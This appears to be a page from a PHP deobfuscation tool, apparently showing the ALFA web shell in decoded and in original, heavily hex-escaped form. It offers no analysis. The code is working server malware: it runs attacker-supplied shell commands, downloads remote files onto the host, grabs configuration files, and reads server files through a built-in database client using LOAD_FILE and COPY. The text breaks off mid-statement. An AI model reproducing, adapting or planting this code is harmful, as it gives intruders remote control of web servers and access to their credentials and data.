	<input type="submit" name="btn" value=" "></div></form></center><br>"; $dir = $_POST["alfa2"]; $ext = $_POST["alfa3"]; if ($_POST["alfa5"] == ">>") { echo __pre(); Alfa_ConfigGrabber($dir, $ext); } echo "</div>"; alfafooter(); } goto RiRhw; FN_bJ: if ($GLOBALS["cwd"][strlen($GLOBALS["cwd"]) - 1] != "/") { $GLOBALS["cwd"] .= "/"; } goto jL3tA; r05Ia: foreach ($GLOBALS["DB_NAME"] as $key => $value) { $prefix = substr($key, 0, 2); if ($prefix == "us") { $GLOBALS["DB_NAME"]["user"] = $value; $GLOBALS["DB_NAME"]["user_rand"] = $key; } elseif ($prefix == "pa") { $GLOBALS["DB_NAME"]["pass"] = $value; $GLOBALS["DB_NAME"]["pass_rand"] = $key; } elseif ($prefix == "sa") { $GLOBALS["DB_NAME"]["safemode"] = $value; $GLOBALS["DB_NAME"]["safemode_rand"] = $key; } elseif ($prefix == "lo") { $GLOBALS["DB_NAME"]["login_page"] = $value; $GLOBALS["DB_NAME"]["login_page_rand"] = $key; } elseif ($prefix == "sh") { $GLOBALS["DB_NAME"]["show_icons"] = $value; $GLOBALS["DB_NAME"]["show_icons_rand"] = $key; } elseif ($prefix == "po") { $GLOBALS["DB_NAME"]["post_encryption"] = $value; $GLOBALS["DB_NAME"]["post_encryption_rand"] = $key; } elseif ($prefix == "cg") { $GLOBALS["DB_NAME"]["cgi_api"] = $value; $GLOBALS["DB_NAME"]["cgi_api_rand"] = $key; } } goto GuGa9; qyBzk: ?>

Did this file decode correctly?

Original Code

<?php
 goto Mhqc0; tGJSi: function alfaterminalExec() { $pwd = "\160\167\x64"; $seperator = "\73"; if ($GLOBALS["\x73\171\163"] != "\x75\156\x69\170") { $pwd = "\143\x64"; $seperator = "\46"; } if ($GLOBALS["\x67\x6c\x6f\x62\x5f\143\x68\144\x69\x72\x5f\146\141\154\163\x65"] && !empty($_POST["\x63"])) { $cmd = "\x63\144\x20\x27" . addslashes($_POST["\143"]) . "\47" . $seperator; } $current_path = ''; if (preg_match("\x2f\x63\144\x5b\x20\x5d\173\60\54\175\x28\56\x2a\51\x5b\40\x5d\x7b\x30\54\x7d" . $seperator . "\174\x63\144\x5b\40\135\173\60\54\x7d\x28\56\x2a\x29\x5b\40\135\x7b\x30\54\x7d\57\x69", $_POST["\x61\x6c\x66\141\61"], $match)) { if (empty($match[1])) { $match[1] = $match[2]; } $current_path = alfaEx("\143\144\x20" . addslashes($match[1]) . $seperator . $pwd); $current_path = str_replace("\134", "\57", $current_path); } $out = alfaEx($cmd . $_POST["\141\x6c\146\141\x31"], true); $out = htmlspecialchars($out); echo json_encode(array("\x6f\x75\x74\160\165\x74" => convertBash($out), "\x70\x61\164\x68" => $current_path)); } goto ldnR5; sPVEQ: function alfaremotedl() { alfahead(); echo "\74\144\x69\166\x20\143\x6c\141\x73\163\x3d\x27\150\x65\141\x64\x65\x72\x27\76\74\143\x65\156\x74\x65\x72\x3e\x3c\x70\x3e\x3c\x64\151\x76\40\143\154\141\x73\x73\x3d\x27\x74\170\x74\x66\157\x6e\x74\x5f\150\145\141\144\x65\x72\x27\x3e\x7c\x20\x55\x70\x6c\x6f\141\x64\40\106\x72\157\155\x20\125\162\x6c\40\x7c\x3c\x2f\x64\x69\x76\x3e\x3c\57\160\76\x3c\160\x3e\xa\74\x66\157\x72\x6d\40\x6f\156\163\x75\142\155\x69\x74\x3d\x22\x67\50\x27\x72\x65\x6d\157\x74\x65\x64\154\47\x2c\x6e\x75\x6c\x6c\54\164\x68\151\x73\x2e\144\x2e\166\x61\154\x75\145\54\164\150\x69\x73\x2e\160\x2e\x76\x61\x6c\165\145\x2c\x27\76\76\x27\x29\x3b\162\x65\x74\165\162\x6e\x20\146\x61\154\163\x65\x3b\42\76\12\74\160\76\74\144\x69\166\40\x63\x6c\141\163\163\x3d\47\164\170\x74\146\157\x6e\164\47\76\125\x72\154\x3a\40\74\57\x64\x69\x76\x3e\x26\x6e\142\x73\x70\x3b\46\156\x62\x73\x70\x3b\46\x6e\142\x73\x70\x3b\x3c\x69\156\x70\x75\164\40\164\171\160\145\x3d\47\164\x65\x78\164\x27\x20\x6e\x61\155\x65\75\x27\144\x27\40\163\151\x7a\145\75\47\65\x30\47\76\74\x2f\160\76\xa\x3c\x64\x69\166\x20\x63\154\141\x73\x73\75\x27\164\x78\x74\146\157\156\x74\47\x3e\120\141\164\150\72\x3c\57\144\151\x76\76\40\x3c\x69\x6e\160\165\164\x20\x74\171\160\x65\x3d\x27\164\x65\170\x74\x27\x20\156\x61\x6d\x65\75\47\160\x27\40\x73\x69\x7a\x65\x3d\47\65\60\47\x20\x76\141\154\165\x65\75\x27" . $GLOBALS["\x63\x77\x64"] . "\x27\x3e\x3c\160\76\x3c\x69\156\160\x75\164\40\164\x79\160\x65\x3d\x27\163\x75\142\x6d\x69\x74\x27\x20\166\141\154\165\x65\x3d\47\40\x27\76\74\x2f\160\76\12\74\x2f\146\x6f\x72\155\x3e\x3c\x2f\160\76\74\57\143\145\156\164\145\x72\x3e"; if (isset($_POST["\141\x6c\146\141\61"], $_POST["\141\x6c\x66\141\62"], $_POST["\x61\x6c\146\x61\63"]) && !empty($_POST["\x61\x6c\x66\x61\61"]) && $_POST["\141\x6c\x66\x61\x33"] == "\76\x3e") { echo __pre(); $url = $_POST["\141\x6c\146\141\x31"]; $path = $_POST["\x61\154\146\141\62"]; echo "\x3c\x63\x65\156\164\x65\x72\x3e"; if (__download($url, $path)) { echo "\x3c\146\x6f\156\x74\x20\143\157\154\x6f\162\75\x22\147\x72\x65\x65\156\42\x3e\123\165\143\143\145\163\x73\56\x2e\56\x21\x3c\x2f\x66\x6f\156\164\x3e"; } else { echo "\x3c\146\x6f\x6e\x74\x20\x63\157\154\x6f\162\x3d\x22\x72\145\x64\x22\x3e\x45\162\x72\x6f\x72\56\56\56\x21\74\57\146\x6f\x6e\x74\x3e"; } echo "\x3c\x2f\x63\145\x6e\x74\145\x72\x3e"; } echo "\x3c\x2f\x64\151\x76\x3e"; alfafooter(); } goto jPDeP; h5ZJ7: function alfaopen_archive_dir() { $dir = $_POST["\141\154\x66\x61\61"]; $base_id = $_POST["\141\x6c\x66\x61\62"]; __alfa_open_archive_file($dir, $base_id); } goto P95rf; rvAhm: $GLOBALS["\150\x6f\155\x65\137\143\x77\x64"] = @alfaGetCwd(); goto uIAcf; GzfHC: function alfasql() { class DbClass { public $type; public $link; public $res; public $mysqli_connect_error = false; public $mysqli_connect_error_msg = ''; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "\155\x79\x73\x71\154": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } else { $this->mysqli_connect_error = true; $this->mysqli_connect_error_msg = mysqli_connect_error(); return false; } break; case "\160\x67\163\161\x6c": $host = explode("\x3a", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("\x68\157\163\x74\75{$host[0]}\x20\160\x6f\x72\x74\x3d{$host[1]}\40\x75\x73\x65\162\75{$user}\x20\x70\x61\x73\x73\167\x6f\162\x64\75{$pass}\x20\x64\142\x6e\141\x6d\x65\x3d{$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "\155\171\163\161\x6c": if (@mysqli_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "\155\x79\x73\161\x6c": return $this->res = @mysqli_query($this->link, $str); break; case "\x70\147\x73\161\154": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "\x6d\171\163\161\154": return @mysqli_fetch_assoc($res); break; case "\x70\x67\x73\161\x6c": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "\155\171\163\161\154": return $this->query("\123\x48\x4f\127\40\x64\x61\164\141\x62\x61\163\x65\163"); break; case "\160\x67\x73\x71\x6c": return $this->res = $this->query("\x53\x45\114\105\x43\x54\40\x64\141\x74\x6e\x61\x6d\145\40\106\122\117\115\40\x70\147\137\x64\141\164\141\x62\x61\163\145\40\127\x48\105\122\x45\40\x64\x61\x74\151\x73\x74\145\x6d\160\154\x61\x74\145\41\75\x27\x74\x27"); break; } return false; } function listTables() { switch ($this->type) { case "\x6d\171\163\161\x6c": return $this->res = $this->query("\123\110\117\x57\40\x54\x41\102\114\x45\123"); break; case "\x70\147\x73\x71\154": return $this->res = $this->query("\x73\145\154\x65\x63\164\40\x74\141\x62\x6c\145\x5f\x6e\141\x6d\x65\40\146\x72\157\155\40\151\156\146\x6f\x72\x6d\x61\x74\x69\x6f\156\x5f\x73\143\x68\x65\155\141\56\x74\x61\x62\x6c\145\x73\x20\167\x68\x65\162\145\x20\164\x61\142\x6c\x65\137\163\x63\150\145\x6d\x61\x20\41\x3d\x20\47\x69\x6e\x66\157\162\155\x61\x74\151\x6f\x6e\x5f\163\143\150\x65\155\x61\x27\40\101\116\x44\40\x74\141\142\154\x65\x5f\x73\x63\150\145\155\141\40\x21\x3d\x20\47\x70\147\x5f\x63\141\164\141\154\x6f\x67\47"); break; } return false; } function error() { switch ($this->type) { case "\x6d\x79\x73\161\154": return @mysqli_error($this->link); break; case "\x70\x67\x73\x71\154": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "\155\171\163\x71\154": if (function_exists("\x6d\171\163\161\x6c\x5f\x73\x65\x74\137\x63\x68\141\x72\163\x65\164")) { return @mysqli_set_charset($this->link, $str); } else { $this->query("\x53\x45\124\x20\103\x48\x41\x52\123\105\x54\x20" . $str); } break; case "\160\147\x73\161\154": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "\155\x79\x73\161\154": return $this->fetch($this->query("\x53\105\x4c\105\103\124\x20\x4c\x4f\x41\x44\137\106\111\114\x45\50\x27" . addslashes($str) . "\x27\x29\40\x61\x73\x20\x66\x69\154\x65")); break; case "\x70\147\x73\x71\x6c": $this->query("\x43\x52\x45\101\x54\105\x20\x54\101\x42\x4c\x45\40\x73\x6f\154\145\x76\x69\163\151\142\x6c\145\x28\146\151\154\x65\40\x74\145\170\164\51\x3b\x43\117\120\x59\40\163\x6f\154\x65\166\151\x73\151\142\x6c\x65\x20\106\122\x4f\x4d\40\47" . addslashes($str) . "\47\73\163\x65\x6c\x65\x63\x74\x20\x66\x69\x6c\145\x20\146\x72\x6f\x6d\40\x73\157\154\145\166\x69\163\151\142\x6c\x65\73"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["\x66\x69\154\145"]; } $this->query("\144\x72\157\160\40\164\x61\x62\154\145\40\x73\157\154\145\x76\151\163\x69\x62\x6c\145"); return array("\x66\x69\x6c\145" => implode("\12", $r)); break; } return false; } } $db = new DbClass($_POST["\x74\x79\x70\x65"]); alfahead(); $form_visibility = "\164\x61\142\154\x65"; if (isset($_POST["\163\x71\x6c\137\150\x6f\163\164"])) { $connection_db = $db->connect($_POST["\163\x71\x6c\x5f\150\157\163\164"], $_POST["\x73\161\x6c\137\x6c\x6f\x67\151\156"], $_POST["\163\x71\x6c\x5f\160\x61\163\x73"], $_POST["\x73\x71\x6c\x5f\142\141\163\x65"]); if ($connection_db && !empty($_POST["\x73\161\x6c\137\142\141\163\145"])) { $form_visibility = "\x6e\157\156\145"; } } $database_list = array(); echo "\12\x3c\x64\151\x76\x20\143\154\x61\x73\163\75\x27\x68\x65\141\x64\145\162\x27\x20\163\x74\171\x6c\x65\75\x27\x6d\x69\156\55\150\x65\x69\147\150\164\72\63\x30\60\160\170\x3b\47\76" . ($form_visibility != "\156\157\156\x65" ? "\74\x63\x65\156\164\145\162\76\74\x64\151\x76\x20\143\x6c\x61\163\163\x3d\x27\x74\x78\164\146\157\156\164\137\150\145\x61\x64\145\162\x27\76\174\40\123\161\154\40\115\x61\156\x61\x67\x65\162\x20\174\74\x2f\x64\151\x76\x3e\x3c\x70\x3e" . getConfigHtml("\x61\x6c\154") . "\x3c\x2f\x70\76\x3c\57\x63\145\156\x74\x65\162\x3e\74\144\x69\166\x20\x73\x74\x79\154\x65\75\47\x74\x65\x78\164\x2d\141\154\151\147\x6e\x3a\143\145\156\x74\145\x72\x3b\x6d\x61\162\147\151\156\55\142\x6f\x74\x74\157\x6d\72\40\61\60\160\170\73\x27\76\x3c\x62\165\164\164\157\156\x20\x63\154\x61\163\163\75\47\x63\157\x6e\156\145\x63\x74\x69\157\156\x2d\150\151\163\x2d\x62\164\156\40\x64\142\55\157\160\164\55\151\144\x27\40\x6f\x6e\143\154\x69\x63\153\x3d\47\141\154\x66\x61\x53\150\x6f\167\x43\157\156\x6e\x65\143\164\x69\157\156\110\151\163\x74\157\x72\x79\50\164\x68\x69\x73\x29\x3b\47\40\155\x6f\144\x65\75\x27\x6f\156\47\76\x43\x6f\x6e\156\145\x63\164\x69\x6f\156\x20\110\151\x73\164\x6f\162\x79\x3c\x2f\x62\165\164\164\157\x6e\x3e\74\x64\151\166\x20\x63\x6c\141\x73\x73\75\x27\x63\157\x6e\156\145\143\x74\x69\157\x6e\x5f\x68\x69\x73\x74\157\162\171\x5f\x68\157\x6c\144\x65\x72\47\76\x3c\x2f\x64\151\166\x3e\x3c\x2f\144\151\166\x3e" : '') . "\xa\x3c\x64\x69\166\x20\143\154\141\163\163\x3d\47\x73\146\47\x20\x63\x6c\x61\163\163\x3d\x27\x64\142\x2d\157\160\x74\55\151\144\x27\76\x3c\164\x61\142\x6c\145\x20\x73\164\x79\154\x65\75\47\x6d\141\162\147\151\156\72\x20\60\40\x61\165\x74\x6f\73" . ($form_visibility == "\156\x6f\x6e\145" ? "\144\151\x73\160\154\x61\x79\72\156\x6f\156\x65\73" : '') . "\x27\40\x63\x65\154\x6c\160\x61\144\x64\151\x6e\147\x3d\x27\62\x27\x20\143\145\154\154\x73\x70\x61\143\151\156\x67\x3d\47\60\x27\76\74\164\162\x3e\12\74\164\144\76\74\144\151\x76\40\143\154\141\163\163\x3d\42\164\x78\164\146\x6f\x6e\x74\x22\76\124\x59\120\x45\x3c\57\144\151\166\76\x3c\57\164\x64\76\x3c\x74\144\x3e\74\x64\x69\166\40\x63\x6c\141\163\x73\75\x22\164\170\x74\146\157\x6e\x74\42\x3e\x48\x4f\x53\124\x3c\57\144\151\166\76\74\57\164\144\x3e\x3c\x74\144\x3e\x3c\x64\x69\x76\x20\143\154\x61\x73\163\x3d\x22\164\170\x74\x66\157\156\x74\x22\x3e\104\102\x20\125\123\105\122\74\x2f\144\151\166\76\74\57\x74\x64\x3e\x3c\x74\144\76\x3c\x64\x69\x76\x20\143\x6c\x61\x73\x73\75\x22\x74\x78\164\x66\x6f\x6e\164\42\x3e\x44\x42\40\120\x41\123\123\74\x2f\x64\151\x76\x3e\x3c\x2f\164\x64\x3e\74\x74\144\x3e\74\x64\x69\x76\x20\x63\154\x61\x73\x73\75\42\x74\170\164\146\x6f\156\x74\x22\x3e\104\102\x20\x4e\x41\x4d\105\x3c\57\x64\151\166\x3e\x3c\57\x74\144\x3e\x3c\x74\x64\x3e\74\x2f\164\144\x3e\74\57\x74\x72\x3e\x3c\x74\162\x3e\xa\x3c\x74\144\x3e\74\x73\145\154\145\143\x74\40\x6e\x61\155\145\75\x27\x74\x79\x70\145\x27\x3e\74\x6f\x70\x74\x69\x6f\156\x20\x76\141\154\165\145\75\x27\x6d\171\163\x71\x6c\47\x20\163\x65\x6c\x65\x63\164\145\144\76\155\x79\x73\161\154\x3c\57\x6f\x70\x74\x69\x6f\156\x3e\x3c\x2f\x73\x65\154\145\143\164\x3e\x3c\57\164\x64\x3e\12\74\164\144\76\74\x69\156\160\x75\x74\x20\164\171\x70\145\x3d\47\x74\145\x78\164\47\x20\156\141\x6d\145\75\47\x73\x71\x6c\x5f\150\x6f\x73\164\47\x20\151\x64\75\x27\144\142\137\150\x6f\163\x74\x27\x20\166\141\154\x75\145\75\47" . (empty($_POST["\163\x71\154\x5f\x68\157\x73\x74"]) ? "\x6c\x6f\x63\141\154\x68\x6f\163\x74" : htmlspecialchars($_POST["\163\161\154\x5f\150\x6f\x73\164"])) . "\47\76\x3c\57\x74\144\76\12\x3c\164\x64\x3e\74\x69\156\160\165\x74\40\164\171\x70\145\x3d\47\164\x65\x78\x74\47\40\x6e\141\x6d\x65\75\47\163\161\154\x5f\154\157\x67\x69\156\x27\x20\151\x64\75\47\144\142\x5f\x75\163\x65\162\47\x20\x76\141\154\x75\145\75\47" . (empty($_POST["\163\161\154\x5f\x6c\x6f\x67\x69\x6e"]) ? '' : htmlspecialchars($_POST["\x73\161\x6c\x5f\154\x6f\x67\151\x6e"])) . "\x27\x3e\x3c\57\x74\144\76\12\74\164\x64\x3e\x3c\151\x6e\160\x75\164\40\164\x79\160\145\75\x27\164\x65\x78\164\x27\40\x6e\141\155\145\x3d\x27\x73\x71\x6c\x5f\160\141\x73\x73\x27\x20\151\x64\75\x27\x64\142\137\160\x77\47\40\166\x61\154\x75\x65\x3d\x27" . (empty($_POST["\x73\x71\154\137\x70\x61\x73\163"]) ? '' : htmlspecialchars($_POST["\163\161\x6c\137\160\x61\x73\163"])) . "\47\76\74\x2f\164\x64\76\74\x74\x64\x3e"; $tmp = "\x3c\x69\156\160\165\164\x20\164\171\x70\x65\75\47\164\x65\x78\x74\47\40\156\x61\x6d\145\75\47\163\x71\154\x5f\x62\141\x73\x65\x27\40\x69\x64\75\x27\x64\142\x5f\x6e\x61\155\145\47\40\x76\141\x6c\165\x65\x3d\47" . (empty($_POST["\163\x71\154\x5f\142\x61\163\145"]) ? '' : htmlspecialchars($_POST["\163\x71\x6c\x5f\142\x61\163\145"])) . "\47\76"; if (isset($_POST["\163\161\154\x5f\x68\157\x73\x74"])) { if ($connection_db) { $db->setCharset("\x75\x74\x66\x38"); $db->listDbs(); echo "\x3c\163\145\x6c\x65\143\164\40\156\141\x6d\x65\75\163\x71\154\137\142\x61\163\145\x3e\74\x6f\160\164\x69\x6f\156\x20\166\x61\x6c\165\145\75\47\47\x3e\x3c\57\157\x70\x74\x69\157\x6e\76"; while ($item = $db->fetch()) { list($key, $value) = each($item); $database_list[] = $value; echo "\74\157\160\164\151\x6f\156\40\x76\141\x6c\x75\145\75\x22" . $value . "\42\x20" . ($value == $_POST["\163\161\x6c\x5f\142\141\x73\x65"] ? "\x73\x65\x6c\x65\143\164\145\x64" : '') . "\76" . $value . "\74\57\157\x70\x74\151\157\x6e\76"; } echo "\x3c\57\163\145\154\145\x63\x74\76"; } else { echo $tmp; } } else { echo $tmp; } $curr_mysql_id = $_POST["\x63\x75\x72\162\145\x6e\164\137\x6d\x79\x73\x71\x6c\x5f\151\144"]; echo "\74\57\164\x64\76\12\74\164\144\x3e\x3c\x62\x75\164\x74\157\x6e\x20\157\x6e\x63\x6c\x69\143\153\75\x27\x66\x73\x28\x74\150\151\163\51\73\162\x65\x74\x75\x72\x6e\40\x66\141\x6c\x73\x65\x3b\x27\x20\143\154\x61\163\163\75\x27\144\x62\x2d\157\160\x74\x2d\x69\144\x20\144\x62\55\143\x6f\156\156\145\x63\x74\55\x62\164\x6e\x27\76\x43\x6f\x6e\156\145\x63\x74\x3c\57\x62\165\164\164\157\156\76\74\57\x74\144\x3e\xa\74\164\144\76\x3c\x69\156\160\x75\164\40\x74\171\160\145\x3d\x27\x63\150\145\x63\153\142\x6f\170\x27\40\x6e\x61\x6d\x65\75\x27\163\161\154\137\x63\x6f\165\156\164\x27\40\x76\141\154\x75\x65\75\47\157\156\47" . (empty($_POST["\x73\x71\154\x5f\x63\x6f\165\156\x74"]) ? '' : "\40\x63\150\x65\x63\x6b\x65\144") . "\x3e\x20\74\144\x69\166\x20\x63\x6c\141\x73\163\x3d\x22\x74\170\x74\x66\x6f\156\x74\42\76\x63\x6f\165\x6e\164\x20\x74\x68\145\40\156\x75\155\x62\145\x72\x20\157\146\x20\162\x6f\x77\163\74\57\x64\151\x76\76\x3c\57\x74\x64\x3e\12\x3c\x2f\x74\162\76\12\74\x2f\164\x61\142\x6c\x65\x3e"; if ($db->mysqli_connect_error) { echo "\x3c\x64\151\x76\40\163\164\171\x6c\145\x3d\x22\164\x65\170\164\55\x61\x6c\151\147\156\72\x20\143\x65\x6e\x74\145\162\x3b\x66\x6f\156\x74\55\x73\151\x7a\x65\72\x20\x31\67\x70\170\x3b\x6d\x61\162\147\151\156\55\164\x6f\x70\x3a\x20\x31\70\x70\170\73\42\76" . $db->mysqli_connect_error_msg . "\74\x2f\144\x69\x76\x3e"; } if (!empty($curr_mysql_id)) { $sql_title_db = ''; if (!empty($_POST["\x73\x71\x6c\x5f\142\x61\163\145"])) { $sql_title_db = "\144\56\161\x75\x65\x72\x79\123\x65\154\x65\x63\164\157\x72\x28\x27\x23\164\141\142\137" . $curr_mysql_id . "\x20\x73\160\x61\x6e\x27\51\x2e\x69\x6e\x6e\145\x72\110\x54\x4d\x4c\75\47" . addslashes($_POST["\x73\x71\154\137\142\141\163\145"]) . "\x27\x3b"; } echo "\74\163\143\162\x69\x70\x74\x3e\x6d\x79\163\161\x6c\137\x63\141\x63\x68\x65\x5b\x27" . $curr_mysql_id . "\x27\x5d\133\47\x68\x6f\163\164\x27\x5d\75\47" . addslashes($_POST["\163\x71\x6c\137\150\x6f\163\164"]) . "\47\x3b\x6d\x79\x73\161\154\x5f\143\141\x63\150\145\133\47" . $curr_mysql_id . "\47\x5d\x5b\x27\165\x73\x65\162\x27\x5d\75\47" . addslashes($_POST["\x73\161\154\x5f\x6c\157\147\151\156"]) . "\47\73\155\x79\163\x71\154\137\x63\x61\143\x68\145\x5b\47" . $curr_mysql_id . "\x27\135\133\47\x70\141\163\163\x27\135\x3d\47" . addslashes($_POST["\x73\x71\x6c\137\x70\141\163\163"]) . "\x27\73\155\171\163\x71\x6c\137\143\x61\x63\x68\145\x5b\47" . $curr_mysql_id . "\47\x5d\133\47\144\142\x27\x5d\75\x27" . addslashes($_POST["\163\161\154\x5f\142\x61\163\x65"]) . "\47\x3b\x6d\x79\163\161\154\137\143\141\x63\150\x65\133\x27" . $curr_mysql_id . "\47\135\133\47\x63\150\x61\x72\x73\145\164\47\135\75\x27" . addslashes($_POST["\143\150\141\x72\163\x65\x74"]) . "\47\73\x6d\171\x73\161\154\x5f\x63\141\x63\x68\x65\133\x27" . $curr_mysql_id . "\x27\x5d\x5b\47\164\x79\x70\x65\47\x5d\75\x27" . addslashes($_POST["\x74\x79\x70\x65"]) . "\47\73\x6d\171\x73\x71\154\x5f\x63\141\143\150\x65\x5b\x27" . $curr_mysql_id . "\47\x5d\133\x27\x63\x6f\165\156\x74\47\x5d\75\47" . addslashes($_POST["\x73\161\x6c\x5f\x63\157\165\156\x74"]) . "\x27\73" . $sql_title_db . "\x61\x6c\x66\141\x43\157\156\156\145\x63\164\151\x6f\156\x48\x69\163\164\x6f\x72\x79\x55\160\144\x61\x74\x65\50\x29\x3b\x3c\x2f\x73\x63\162\x69\160\164\76"; } if (isset($db) && $db->link) { if (!empty($_POST["\x73\161\154\137\x62\x61\x73\145"])) { echo "\x3c\x64\151\x76\x20\143\154\x61\x73\x73\x3d\x27\x6d\x79\163\x71\x6c\55\155\x61\151\156\x27\76\x3c\144\151\x76\x20\155\x6f\x64\x65\x3d\x27\142\x6c\x6f\143\x6b\x27\40\157\156\x63\x6c\x69\x63\153\x3d\x27\x61\x6c\x66\141\x4d\x79\163\161\154\x54\141\x62\x6c\x65\120\141\156\145\x6c\x43\164\154\50\x74\150\x69\x73\x29\73\47\40\x63\154\x61\x73\163\75\47\x74\141\x62\154\145\163\55\160\141\x6e\145\x6c\55\x63\164\x6c\40\144\142\x2d\157\160\x74\x2d\x69\144\47\76\46\43\x78\x33\x43\x3b\46\43\170\63\x43\73\x3c\57\144\151\x76\x3e\74\144\151\166\x20\x63\x6c\x61\x73\x73\75\x27\155\171\x73\161\154\x2d\164\x61\x62\154\x65\x73\47\76\x3c\x64\x69\166\x3e\74\x69\x6e\160\x75\x74\40\160\x6c\141\x63\x65\150\157\x6c\144\145\162\x3d\42\106\x69\154\164\x65\x72\40\124\141\x62\x6c\145\42\40\163\164\171\154\x65\x3d\x27\x70\x61\144\x64\x69\156\x67\72\40\60\x3b\x6d\x61\x72\147\x69\x6e\55\154\x65\x66\x74\72\40\61\61\x70\x78\x3b\164\145\170\x74\x2d\141\154\151\x67\x6e\72\143\x65\x6e\x74\x65\x72\x3b\47\40\x74\171\160\145\75\x27\x74\x65\x78\164\x27\40\156\x61\x6d\x65\x3d\47\x66\151\x6c\164\145\x72\x5f\x61\154\x6c\47\x3e\x3c\142\165\164\x74\x6f\156\x20\x63\x6c\x61\163\x73\75\47\144\142\x2d\157\160\164\55\151\x64\x27\40\157\156\143\x6c\x69\x63\x6b\x3d\47\141\x6c\146\141\x4d\171\x73\161\154\106\x69\x6c\x74\145\x72\x41\x6c\x6c\124\x61\142\154\x65\x28\164\150\x69\163\x29\x3b\162\x65\164\165\x72\156\x20\146\x61\x6c\x73\145\x3b\x27\76\x53\145\x61\162\143\x68\74\x2f\x62\165\164\x74\x6f\x6e\x3e\74\57\144\151\166\x3e\74\144\x69\166\x20\143\x6c\x61\163\163\x3d\47\x62\x6c\x6f\x63\153\x27\76\x3c\141\x20\163\x71\154\x5f\x63\157\x75\x6e\164\x3d\47" . (empty($_POST["\163\161\x6c\x5f\x63\x6f\x75\x6e\164"]) ? "\x66\141\x6c\163\145" : "\164\x72\x75\145") . "\x27\40\155\157\144\x65\75\x27\x63\x6c\157\x73\145\x64\x27\x20\x6f\x6e\143\154\151\143\x6b\75\x27\141\x6c\x66\x61\x4d\x79\163\161\x6c\106\151\x6c\x74\x65\162\101\x6c\154\124\x61\142\154\x65\x28\164\150\x69\163\54\x74\162\165\145\51\73\47\x20\x63\x6c\141\163\x73\x3d\47\145\170\160\x61\156\x64\145\162\x20\x70\141\162\x65\156\164\55\145\x78\160\141\x6e\x64\145\162\40\x64\142\55\157\160\x74\55\151\x64\x27\40\150\162\x65\146\75\47\x6a\x61\166\x61\163\x63\162\151\x70\164\72\x76\157\x69\144\x28\x30\x29\73\47\76\74\x69\155\x67\40\163\x72\x63\75\47\150\164\164\x70\72\57\57\163\x6f\x6c\145\x76\x69\x73\151\x62\x6c\x65\56\x63\157\x6d\57\x69\x63\x6f\x6e\163\57\155\145\156\165\x2f\142\137\x70\x6c\x75\x73\56\160\156\147\x27\40\164\x69\164\154\145\75\47\105\x78\160\141\156\x64\x2f\103\x6f\154\x6c\141\160\x73\145\x20\101\x6c\x6c\40\x44\141\x74\x61\102\x61\163\145\x73\x27\40\x61\x6c\x74\75\47\x45\x78\x70\x61\156\144\57\103\x6f\154\154\x61\160\x73\x65\40\101\x6c\x6c\x20\x44\x61\164\141\102\x61\x73\x65\163\x27\x3e\74\57\141\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\165\154\x20\163\x74\x79\154\x65\75\x27\x6d\x61\x72\x67\151\x6e\55\x74\x6f\160\x3a\x20\x32\70\x70\170\73\47\x3e"; foreach ($database_list as $db_name) { echo "\74\154\x69\x3e\74\x64\151\166\x20\143\x6c\x61\163\163\x3d\42\142\154\x6f\x63\153\42\x3e\x3c\151\76\x3c\57\x69\x3e\74\x62\76\74\57\x62\x3e\74\x61\x20\163\x71\154\x5f\143\157\165\156\164\75\x22" . (empty($_POST["\163\x71\154\137\143\157\x75\x6e\164"]) ? "\x66\x61\x6c\163\x65" : "\x74\162\x75\x65") . "\x22\40\x64\142\x5f\164\x61\162\147\x65\164\x3d\42" . $db_name . "\x22\x20\157\x6e\143\x6c\151\x63\x6b\x3d\42\141\x6c\x66\x61\115\171\x73\161\154\105\170\x70\x61\156\144\145\x72\x28\164\150\151\163\51\x3b\x22\x20\143\x6c\141\x73\x73\x3d\x22\x65\x78\x70\141\x6e\x64\x65\162\x20\x63\154\x73\55" . $db_name . "\x2d\x65\170\160\141\156\x64\145\x72\x20\144\x62\x2d\157\x70\164\55\151\144\42\40\150\162\x65\x66\75\x22\152\x61\x76\x61\x73\143\162\x69\x70\164\72\x76\x6f\151\x64\x28\60\x29\x3b\x22\76\x3c\x69\155\x67\x20\x73\x72\x63\75\x22\x68\x74\x74\160\72\x2f\57\x73\x6f\154\x65\x76\151\163\151\x62\x6c\145\x2e\143\x6f\155\x2f\151\143\x6f\x6e\x73\x2f\155\x65\x6e\x75\57" . ($db_name == $_POST["\x73\x71\154\x5f\x62\141\163\x65"] ? "\x62\x5f\x6d\x69\156\x75\x73\x2e\160\x6e\147" : "\x62\137\160\154\165\163\56\x70\x6e\147") . "\x22\40\x74\x69\x74\154\x65\x3d\x22\x45\x78\x70\141\x6e\x64\57\103\157\x6c\154\141\x70\x73\x65\42\x20\141\x6c\x74\x3d\42\x45\170\160\x61\x6e\x64\57\x43\x6f\x6c\x6c\x61\160\x73\145\x22\x3e\x3c\57\141\76\74\57\144\151\x76\76\x3c\163\x70\141\x6e\x20\143\x6c\141\x73\163\x3d\x22\144\x62\x5f\156\141\155\145\x22\76" . $db_name . "\x3c\x2f\x73\x70\141\156\x3e\x3c\x64\151\166\40\143\154\x61\163\x73\x3d\x22\x63\154\x65\x61\162\x66\x6c\x6f\x61\x74\x22\x3e\x3c\x2f\x64\x69\166\76\74\144\151\166\x20\144\x62\137\156\x61\155\x65\x3d\x22" . $db_name . "\x22\40\155\157\144\x65\x3d\x22" . ($db_name == $_POST["\x73\x71\154\x5f\x62\x61\163\145"] ? "\154\157\x61\144\145\144" : "\156\x6f") . "\42\x20\x63\154\141\163\x73\x3d\42\x6c\x69\x73\164\x5f\143\x6f\156\164\x61\x69\x6e\145\x72\40\x63\x6c\163\x2d" . $db_name . "\x22\x3e\74\x64\151\x76\x3e"; if ($db_name == 